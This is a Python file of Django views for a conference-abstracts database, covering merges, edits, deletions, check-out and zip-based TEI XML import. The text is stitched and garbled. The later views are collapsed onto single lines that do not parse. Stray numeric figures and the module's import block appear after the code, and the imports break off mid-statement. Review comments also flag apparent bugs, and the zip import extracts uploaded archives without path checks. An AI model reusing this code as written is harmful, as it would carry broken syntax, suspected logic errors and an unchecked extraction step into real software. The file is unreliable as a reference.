    return JsonResponse({"name": str(affiliation), "id": affiliation.pk})


@user_is_staff
@transaction.atomic
def affiliation_merge(request, affiliation_id):
    """
    Merge one affiliation into another chosen via AffiliationMergeForm.

    GET renders the confirmation form; POST reassigns the source
    affiliation's records to the target and deletes the source.
    """
    affiliation = get_object_or_404(Affiliation, pk=affiliation_id)
    context = {"merging": affiliation, "affiliation_merge_form": AffiliationMergeForm}
    if request.method == "GET":
        # Initial load of the merge form displays all the authors and works
        # associated with this affiliation.
        return render(request, "affiliation_merge.html", context)
    elif request.method == "POST":
        submitted = AffiliationMergeForm(request.POST)
        if submitted.is_valid():
            target_affiliation = submitted.cleaned_data["into"]
            if affiliation == target_affiliation:
                # Refuse self-merge: it would delete the record outright.
                messages.error(
                    request,
                    f"You cannot merge an affiliation into itself. Please select a different affiliation.",
                )
                return redirect("affiliation_merge", affiliation_id=affiliation_id)
            else:
                old_affiliation_id = str(affiliation)
                merge_results = affiliation.merge(target_affiliation)
                messages.success(
                    request,
                    f"Affiliation {old_affiliation_id} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.",
                )
                messages.success(
                    request, f"{merge_results['update_results']} affiliations updated"
                )
                return redirect("affiliation_edit", pk=target_affiliation.pk)
        else:
            for error in submitted.errors:
                messages.error(request, error)
            return render(request, "affiliation_merge.html", context)
@user_is_staff
@transaction.atomic
def affiliation_multi_merge(request):
    """Merge multiple source affiliations into one target affiliation."""
    context = {"form": AffiliationMultiMergeForm}
    if request.method == "POST":
        submitted = AffiliationMultiMergeForm(request.POST)
        if submitted.is_valid():
            target_affiliation = submitted.cleaned_data["into"]
            # Never treat the target itself as a merge source.
            source_affiliations = submitted.cleaned_data["sources"].exclude(
                pk=target_affiliation.pk
            )
            for source in source_affiliations:
                source_label = str(source)
                merge_results = source.merge(target_affiliation)
                messages.success(
                    request,
                    f"Affiliation {source_label} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.",
                )
                messages.success(
                    request, f"{merge_results['update_results']} affiliations updated"
                )
            return redirect("affiliation_edit", pk=target_affiliation.pk)
        else:
            for error in submitted.errors:
                messages.error(request, error)
    return render(request, "affiliation_multi_merge.html", context)


@user_is_staff
@transaction.atomic
def wipe_unused(request):
    """
    Show orphaned records (authors, affiliations, institutions, keywords,
    appellations no longer referenced by anything) and delete them on POST.
    """
    deletion_dict = {
        "Author": Author.objects.exclude(authorships__isnull=False).distinct(),
        "Affiliation": Affiliation.objects.exclude(
            asserted_by__isnull=False
        ).distinct(),
        "Institution": Institution.objects.exclude(
            Q(affiliations__asserted_by__isnull=False) | Q(conferences__isnull=False)
        ).distinct(),
        "Keyword": Keyword.objects.exclude(works__isnull=False).distinct(),
        "Appellation": Appellation.objects.exclude(
            asserted_by__isnull=False
        ).distinct(),
    }
    if request.method == "POST":
        for label, queryset in deletion_dict.items():
            deleted_count = queryset.delete()[0]
            if deleted_count > 0:
                messages.success(request, f"{label}: {deleted_count} objects deleted")
    # Re-evaluate after any deletion so the template knows if leftovers remain.
    any_hanging_items = any(qs.exists() for qs in deletion_dict.values())
    context = {"deletions": deletion_dict, "hanging_items": any_hanging_items}
    return render(request, "wipe_unused.html", context)
class ConferenceCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView):
    """Create a conference and attach the organizers chosen in the form."""

    model = Conference
    template_name = "conference_create.html"
    form_class = ConferenceForm
    extra_context = {
        "form_title": "Create conference",
        "cancel_view": "conference_list",
    }
    success_message = "Conference '%(year)s - %(short_title)s' created"

    @transaction.atomic
    def post(self, request, *args, **kwargs):
        # Let CreateView persist the conference, then attach the M2M
        # organizers from the re-validated form.
        response = super().post(request, *args, **kwargs)
        form_instance = self.get_form()
        if form_instance.is_valid():
            for organizer in form_instance.cleaned_data["organizers"]:
                self.object.organizers.add(organizer)
            self.object.save()
            return response
        # NOTE(review): because the valid branch returns above, this
        # "goto_abstracts" redirect is only reachable when the form is
        # invalid — that looks unintended; confirm against the original
        # (unminified) source before relying on it.
        if "goto_abstracts" in request.POST:
            return redirect(reverse("work_list") + f"?conference={self.object.id}")
        else:
            for err in form_instance.errors:
                messages.error(request, err)
        return response


@user_is_staff
@transaction.atomic
def ConferenceEdit(request, pk):
    """
    Function-based edit view for a conference: updates scalar fields,
    organizer/hosting-institution relations, an optional bulk license
    action on its works, and its series memberships (via a formset).
    """
    conference = get_object_or_404(Conference, pk=pk)
    # populate the conference form, including pulling in the related organizers
    conference_dict = model_to_dict(conference)
    conference_dict["organizers"] = conference.organizers.all()
    form = ConferenceForm(initial=conference_dict)
    ConferenceSeriesFormSet = formset_factory(
        ConferenceSeriesInline, can_delete=True, extra=0
    )
    initial_series = [
        {"series": memb.series, "number": memb.number}
        for memb in SeriesMembership.objects.filter(conference=conference).all()
    ]
    context = {
        "conference": conference,
        "form": form,
        # "licenses": License.objects.all(),
        "series_membership_form": ConferenceSeriesFormSet(initial=initial_series),
        "form_title": "Edit conference",
        "cancel_view": "conference_list",
    }
    if request.method == "POST":
        form = ConferenceForm(data=request.POST, instance=conference)
        if form.is_valid():
            clean_form = form.cleaned_data
            conference.year = clean_form["year"]
            conference.short_title = clean_form["short_title"]
            conference.notes = clean_form["notes"]
            conference.url = clean_form["url"]

            # Clear existing relations and update according to the form
            conference.organizers.clear()
            for organizer in clean_form["organizers"]:
                conference.organizers.add(organizer)
            conference.hosting_institutions.clear()
            for hosting_institution in clean_form["hosting_institutions"]:
                conference.hosting_institutions.add(hosting_institution)
            conference.save()

            # License action: "" = leave works untouched, "clear" = strip the
            # license from all works, otherwise the value is a License pk to
            # apply to every work of this conference.
            license_action = clean_form["license_action"]
            if license_action == "":
                pass
            elif license_action == "clear":
                conference.works.all().update(full_text_license=None)
            else:
                license_object = License.objects.get(id=int(license_action))
                conference.works.all().update(full_text_license=license_object)

            series_forms = ConferenceSeriesFormSet(data=request.POST)
            if series_forms.is_valid():
                # Delete memberships first
                for d_form in series_forms.deleted_forms:
                    d_form_data = d_form.cleaned_data
                    SeriesMembership.objects.filter(
                        conference=conference,
                        series=d_form_data["series"],
                        number=d_form_data["number"],
                    ).delete()
                # Then update new ones
                for s_form in series_forms.forms:
                    if s_form not in series_forms.deleted_forms:
                        s_form_data = s_form.cleaned_data
                        SeriesMembership.objects.update_or_create(
                            conference=conference,
                            series=s_form_data["series"],
                            defaults={"number": s_form_data["number"]},
                        )
                messages.success(request, f"Conference {conference} updated.")
                # Optional post-save navigation shortcuts from the template.
                if "goto_abstracts" in request.POST:
                    return redirect(
                        reverse("work_list") + f"?conference={conference.id}"
                    )
                if "goto_series" in request.POST:
                    first_series = conference.series.first()
                    if first_series is None:
                        return redirect("standalone_conferences")
                    else:
                        return redirect("conference_series_detail", pk=first_series.id)
                return redirect("conference_edit", pk=conference.pk)
            else:
                # NOTE(review): a formset's .errors is a list of per-form
                # error dicts, not a dict — .items() here looks like it would
                # raise AttributeError; confirm before changing.
                for f, e in series_forms.errors.items():
                    messages.error(request, f"{f}: {e}")
        else:
            for f, e in form.errors.items():
                messages.error(request, f"{f}: {e}")
    return render(request, "conference_edit.html", context)


class ConferenceDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView):
    """Delete a conference, flashing a success message first."""

    model = Conference
    template_name = "conference_delete.html"
    extra_context = {
        "form_title": "Delete conference",
        "cancel_view": "conference_list",
    }
    success_message = "Conference deleted"
    success_url = reverse_lazy("conference_list")

    def delete(self, request, *args, **kwargs):
        # SuccessMessageMixin does not fire on delete(), so flash manually.
        messages.success(self.request, self.success_message)
        return super(ConferenceDelete, self).delete(request, *args, **kwargs)
class ConferenceXMLLoad(StaffRequiredMixin, DetailView):
    """Upload a zip of TEI XML files and bulk-import them into a conference."""

    model = Conference
    template_name = "conference_xml_load.html"
    extra_context = {"form": ConferenceXMLUploadForm()}

    @transaction.atomic
    def post(self, request, *args, **kwargs):
        raw_form = ConferenceXMLUploadForm(request.POST, request.FILES)
        conference = self.get_object()
        if raw_form.is_valid():
            with TemporaryDirectory() as upload_dir:
                # Write uploaded zip to tempdir
                with NamedTemporaryFile(dir=upload_dir, suffix=".zip") as tei_zip:
                    with open(tei_zip.name, "wb") as upload_zip:
                        for chunk in request.FILES["file"]:
                            upload_zip.write(chunk)
                    # Reject non-zip uploads before attempting extraction.
                    if not zipfile.is_zipfile(tei_zip.name):
                        messages.error(request, "That is not a valid zipfile.")
                        return render(
                            request,
                            "conference_xml_load.html",
                            {
                                "object": self.get_object(),
                                "form": ConferenceXMLUploadForm(),
                            },
                        )
                    # Extract all the files within
                    with zipfile.ZipFile(tei_zip.name) as zip_ref:
                        zip_ref.extractall(upload_dir)
                    # Import all XML
                    import_results = conference.import_xml_directory(upload_dir)
                    n_success = len(import_results["successful_files"])
                    n_failed = len(import_results["failed_files"])
                    messages.info(
                        request,
                        f"{n_success} of {n_success + n_failed} files valid.",
                    )
                    # Surface each per-file failure individually.
                    for err in import_results["failed_files"]:
                        messages.error(
                            request, f"{basename(err['filepath'])}: {err['error']}"
                        )
                    if n_failed == 0:
                        messages.success(request, f"All files imported successfully.")
                    else:
                        messages.info(
                            request,
                            "Please fix errors or remove malformed files, and re-upload zip. All TEI documents must be valid in order to complete the import.",
                        )
                    return render(
                        request,
                        "conference_xml_load.html",
                        {"object": self.get_object(), "form": ConferenceXMLUploadForm()},
                    )
        else:
            for f, e in raw_form.errors.items():
                messages.error(request, f"{f}: {e}")
            return render(
                request,
                "conference_xml_load.html",
                {"object": self.get_object(), "form": ConferenceXMLUploadForm()},
            )


@login_required
@transaction.atomic
def conference_checkout(request, conference_id):
    """
    Check a conference in or out for data entry: sets entry_status and
    assigns/clears the editing user. Marking "complete" ('c') is staff-only.
    """
    conference = get_object_or_404(Conference, pk=conference_id)
    if request.method == "GET":
        """
        Load the current form and display current attached user
        """
        context = {
            "conference": conference,
            "form": ConferenceCheckoutForm(
                {"entry_status": conference.entry_status, "editing_user": "self"}
            ),
        }
        return render(request, "conference_checkout.html", context)
    elif request.method == "POST":
        """
        Get the form and update the status if the user has the authority to do so
        """
        raw_form = ConferenceCheckoutForm(request.POST)
        if raw_form.is_valid():
            clean_form = raw_form.cleaned_data
            # Only staff may mark a conference as completed ('c').
            if clean_form["entry_status"] == "c" and not request.user.is_staff:
                messages.error(
                    request,
                    "Only an administrator can mark this conference as completed.",
                )
                return redirect("conference_checkout", conference_id=conference.id)
            else:
                if clean_form["assign_user"] == "self":
                    conference.entry_status = clean_form["entry_status"]
                    conference.editing_user = request.user
                    conference.save()
                    messages.success(request, "Conference checked out")
                elif clean_form["assign_user"] == "clear":
                    conference.entry_status = clean_form["entry_status"]
                    conference.editing_user = None
                    conference.save()
                    messages.success(request, "Conference cleared")
        return redirect(reverse("work_list") + f"?conference={conference.id}")
class SeriesCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView):
    """Create a new conference series."""

    model = ConferenceSeries
    template_name = "generic_form.html"
    fields = ["title", "abbreviation", "notes"]
    extra_context = {
        "form_title": "Create conference series",
        "cancel_view": "conference_list",
    }
    success_message = "Series '%(title)s' created"
    success_url = reverse_lazy("conference_list")


class SeriesEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView):
    """Update an existing conference series."""

    model = ConferenceSeries
    template_name = "generic_form.html"
    fields = ["title", "abbreviation", "notes"]
    extra_context = {
        "form_title": "Update conference series",
        "cancel_view": "conference_list",
    }
    success_message = "Series '%(title)s' updated"
    success_url = reverse_lazy("conference_list")


class SeriesDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView):
    """Delete a conference series, flashing a success message first."""

    model = ConferenceSeries
    template_name = "generic_form.html"
    extra_context = {
        "form_title": "Delete conference series",
        "cancel_view": "conference_list",
    }
    success_message = "Series '%(title)s' deleted"
    success_url = reverse_lazy("conference_list")

    def delete(self, request, *args, **kwargs):
        # SuccessMessageMixin does not fire on delete(), so flash manually.
        messages.success(self.request, self.success_message)
        return super().delete(request, *args, **kwargs)


class OrganizerCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView):
    """Create a conference organizer, stamping the creating user."""

    model = Organizer
    template_name = "generic_form.html"
    fields = ["name", "abbreviation", "conferences_organized", "notes", "url"]
    extra_context = {
        "form_title": "Create conference organizer",
        "cancel_view": "full_organizer_list",
    }
    success_message = "Organizer '%(name)s' created"
    success_url = reverse_lazy("full_organizer_list")

    def form_valid(self, form):
        response = super().form_valid(form)
        self.object.user_last_updated = self.request.user
        self.object.save()
        return response
class OrganizerEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView):
    """Update a conference organizer, stamping the editing user."""

    model = Organizer
    template_name = "generic_form.html"
    fields = ["name", "abbreviation", "conferences_organized", "notes", "url"]
    extra_context = {
        "form_title": "Update conference organizer",
        "cancel_view": "full_organizer_list",
    }
    success_message = "Organizer '%(name)s' updated"
    success_url = reverse_lazy("full_organizer_list")

    def form_valid(self, form):
        response = super().form_valid(form)
        self.object.user_last_updated = self.request.user
        self.object.save()
        return response


class OrganizerDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView):
    """Delete an organizer, flashing a success message first."""

    model = Organizer
    template_name = "generic_form.html"
    extra_context = {
        "form_title": "Delete organizer",
        "cancel_view": "full_organizer_list",
    }
    success_message = "Organizer %(name)s deleted."
    success_url = reverse_lazy("full_organizer_list")

    def delete(self, request, *args, **kwargs):
        # SuccessMessageMixin does not fire on delete(), so flash manually.
        messages.success(self.request, self.success_message)
        return super().delete(request, *args, **kwargs)


class OrganizerList(LoginRequiredMixin, ListView):
    """Plain listing of all conference organizers."""

    model = Organizer
    template_name = "full_organizer_list.html"
    context_object_name = "organizer_list"


class KeywordCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView):
    """Create a keyword."""

    model = Keyword
    template_name = "generic_form.html"
    fields = ["title"]
    extra_context = {"form_title": "Create keyword", "cancel_view": "full_keyword_list"}
    success_message = "Keyword '%(title)s' created"
    success_url = reverse_lazy("full_keyword_list")


class KeywordDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView):
    """Delete a keyword, flashing a success message first."""

    model = Keyword
    template_name = "generic_form.html"
    extra_context = {"form_title": "Delete keyword", "cancel_view": "full_keyword_list"}
    success_message = "Keyword '%(title)s' deleted"
    success_url = reverse_lazy("full_keyword_list")

    def delete(self, request, *args, **kwargs):
        # SuccessMessageMixin does not fire on delete(), so flash manually.
        messages.success(self.request, self.success_message)
        return super().delete(request, *args, **kwargs)
template_name = "generic_form.html" extra_context = { "form_title": "Update keyword", "cancel_view": "full_keyword_list", "merge_view": "keyword_merge", "delete_view": "keyword_delete", } fields = ["title"] success_message = "Keyword '%(title)s' updated" success_url = reverse_lazy("full_keyword_list") class KeywordList(LoginRequiredMixin, ListView): model = Keyword template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Keywords", "tag_edit_view": "keyword_edit", "tag_create_view": "keyword_create", "tag_list_view": "full_keyword_list", "multi_merge": "keyword_multi_merge", "filter_param_name": "keywords", } def get_queryset(self): base_results_set = Keyword.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) if self.request.GET: raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter( title__icontains=filter_form["name"] ) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") else: results_set = results_set.order_by("title") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["tag_filter_form"] = TagForm(initial=self.request.GET) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Keyword.objects.count() return context @user_is_staff @transaction.atomic def keyword_merge(request, keyword_id): keyword = get_object_or_404(Keyword, pk=keyword_id) affected_works = Work.objects.filter(keywords=keyword).all() sample_works = affected_works[:15] count_elements = 
affected_works.count() - 15 context = { "merging": keyword, "tag_merge_form": KeywordMergeForm, "sample_elements": sample_works, "tag_category": "Keyword", "merge_view": "keyword_merge", } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this keyword. """ return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = KeywordMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] if keyword == target_keyword: """ If the user chooses the existing keyword, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a keyword into itself. Please select a different keyword.", ) return redirect("keyword_merge", keyword_id=keyword_id) else: old_keyword_id = str(keyword) merge_results = keyword.merge(target_keyword) messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) @user_is_staff @transaction.atomic def keyword_multi_merge(request): context = { "tag_merge_form": KeywordMultiMergeForm, "tag_category": "Keyword", "multi_merge_view": "keyword_multi_merge", } if request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. 
""" raw_form = KeywordMultiMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] source_keywords = raw_form.cleaned_data["sources"].exclude( pk=target_keyword.pk ) for keyword in source_keywords: old_keyword_id = keyword.title merge_results = keyword.merge(target_keyword) messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class TopicCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Create topic", "cancel_view": "full_topic_list"} fields = ["title"] success_message = "Topic '%(title)s' created" success_url = reverse_lazy("full_topic_list") class TopicDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Delete topic", "cancel_view": "full_topic_list"} success_message = "Topic '%(title)s' deleted" success_url = reverse_lazy("full_topic_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(TopicDelete, self).delete(request, *args, **kwargs) class TopicEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Topic template_name = "generic_form.html" extra_context = { "form_title": "Update topic", "cancel_view": "full_topic_list", "merge_view": "topic_merge", "delete_view": "topic_delete", } fields = ["title"] success_message = "Topic '%(title)s' updated" success_url = reverse_lazy("full_topic_list") class TopicList(LoginRequiredMixin, ListView): model = Topic template_name = "tag_list.html" context_object_name = "tag_list" 
extra_context = { "tag_category": "Topics", "tag_edit_view": "topic_edit", "tag_create_view": "topic_create", "tag_filter_form": TagForm, "tag_list_view": "full_topic_list", "multi_merge": "topic_multi_merge", "filter_param_name": "topics", } def get_queryset(self): base_results_set = Topic.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Topic.objects.count() return context @user_is_staff @transaction.atomic def topic_merge(request, topic_id): topic = get_object_or_404(Topic, pk=topic_id) affected_elements = topic.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": topic, "tag_merge_form": TopicMergeForm, "tag_category": "Topic", "merge_view": "topic_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this topic. """ return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. 
""" raw_form = TopicMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] if topic == target_topic: """ If the user chooses the existing topic, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a topic into itself. Please select a different topic.", ) return redirect("topic_merge", topic_id=topic_id) else: old_topic_id = str(topic) merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) @user_is_staff @transaction.atomic def topic_multi_merge(request): context = { "tag_merge_form": TopicMultiMergeForm, "tag_category": "Topic", "multi_merge_view": "topic_multi_merge", } if request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. 
""" raw_form = TopicMultiMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] source_topics = raw_form.cleaned_data["sources"].exclude(pk=target_topic.pk) for topic in source_topics: old_topic_id = topic.title merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class LanguageCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Create language", "cancel_view": "full_language_list", } fields = ["title", "code"] success_message = "Language '%(title)s' created" success_url = reverse_lazy("full_language_list") class LanguageDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Delete language", "cancel_view": "full_language_list", } success_message = "Language '%(title)s' deleted" success_url = reverse_lazy("full_language_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(LanguageDelete, self).delete(request, *args, **kwargs) class LanguageEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Update language", "cancel_view": "full_language_list", "merge_view": "language_merge", "delete_view": "language_delete", } fields = ["title", "code"] success_message = "Language '%(title)s' updated" success_url = reverse_lazy("full_language_list") class LanguageList(LoginRequiredMixin, ListView): model = Language template_name = 
"tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Languages", "tag_edit_view": "language_edit", "tag_create_view": "language_create", "tag_filter_form": TagForm, "tag_list_view": "full_language_list", "filter_param_name": "languages", } def get_queryset(self): base_results_set = Language.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Language.objects.count() return context @user_is_staff @transaction.atomic def language_merge(request, language_id): language = get_object_or_404(Language, pk=language_id) affected_elements = language.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": language, "tag_merge_form": LanguageMergeForm, "tag_category": "Language", "merge_view": "language_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this language. """ return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. 
""" raw_form = LanguageMergeForm(request.POST) if raw_form.is_valid(): target_language = raw_form.cleaned_data["into"] if language == target_language: """ If the user chooses the existing language, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a language into itself. Please select a different language.", ) return redirect("language_merge", language_id=language_id) else: old_language_id = str(language) merge_results = language.merge(target_language) messages.success( request, f"Language {old_language_id} has been merged into {target_language}, and the old language entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} languages updated" ) return redirect("language_edit", pk=target_language.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) class WorkTypeCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Create work_type", "cancel_view": "full_work_type_list", } fields = ["title", "is_parent"] success_message = "Abstract type '%(title)s' created" success_url = reverse_lazy("full_work_type_list") class WorkTypeDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Delete work_type", "cancel_view": "full_work_type_list", } success_message = "Abstract type '%(title)s' deleted" success_url = reverse_lazy("full_work_type_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(WorkTypeDelete, self).delete(request, *args, **kwargs) class WorkTypeEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Update abstract type", "cancel_view": "full_work_type_list", "merge_view": "work_type_merge", 
"delete_view": "work_type_delete", } fields = ["title", "is_parent"] success_message = "Abstract '%(title)s' updated" success_url = reverse_lazy("full_work_type_list") class WorkTypeList(LoginRequiredMixin, ListView): model = WorkType template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Abstract Types", "tag_edit_view": "work_type_edit", "tag_create_view": "work_type_create", "tag_filter_form": TagForm, "tag_list_view": "full_work_type_list", "filter_param_name": "work_type", } def get_queryset(self): base_results_set = WorkType.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = WorkType.objects.count() return context @user_is_staff @transaction.atomic def work_type_merge(request, work_type_id): work_type = get_object_or_404(WorkType, pk=work_type_id) affected_elements = work_type.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": work_type, "tag_merge_form": WorkTypeMergeForm, "tag_category": "Abstract Type", "merge_view": "work_type_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": """ Initial load of the merge form displays all the authors and works associated with this work_type. 
""" return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = WorkTypeMergeForm(request.POST) if raw_form.is_valid(): target_work_type = raw_form.cleaned_data["into"] if work_type == target_work_type: """ If the user chooses the existing work_type, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a work_type into itself. Please select a different work_type.", ) return redirect("work_type_merge", work_type_id=work_type_id) else: old_work_type_id = str(work_type) merge_results = work_type.merge(target_work_type) messages.success( request, f"WorkType {old_work_type_id} has been merged into {target_work_type}, and the old work_type entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} work_types updated" ) return redirect("work_type_edit", pk=target_work_type.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context)
36.697767
176
0.59906
from django.shortcuts import render from django.http import HttpResponse, JsonResponse, StreamingHttpResponse, FileResponse from django.template import loader from django.shortcuts import get_object_or_404, render, redirect from django.views import View from django.views.generic import DetailView, ListView from django.db.models import ( Count, Max, Min, Q, F, Prefetch, Subquery, OuterRef, ExpressionWrapper, FloatField, BooleanField, ) from django.db.models.functions import Concat, FirstValue, Cast from django.core import management from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator from django.db.models.functions import Coalesce from django.contrib.postgres.search import SearchRank, SearchQuery from django.contrib.postgres.aggregates import StringAgg from django.urls import reverse, reverse_lazy from django.contrib import messages from django.contrib.messages.views import SuccessMessageMixin from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin from django.contrib.auth.decorators import login_required, user_passes_test from dal.autocomplete import Select2QuerySetView from django.views.generic.edit import CreateView, DeleteView, UpdateView from django.db import transaction, IntegrityError from django.forms.models import model_to_dict from django.forms import formset_factory, inlineformset_factory, modelformset_factory from django.conf import settings from django.utils.html import format_html from django.views.decorators.cache import cache_page import glob from os.path import basename, getmtime from datetime import datetime import csv import sys from operator import attrgetter from tempfile import NamedTemporaryFile, TemporaryDirectory import zipfile from . 
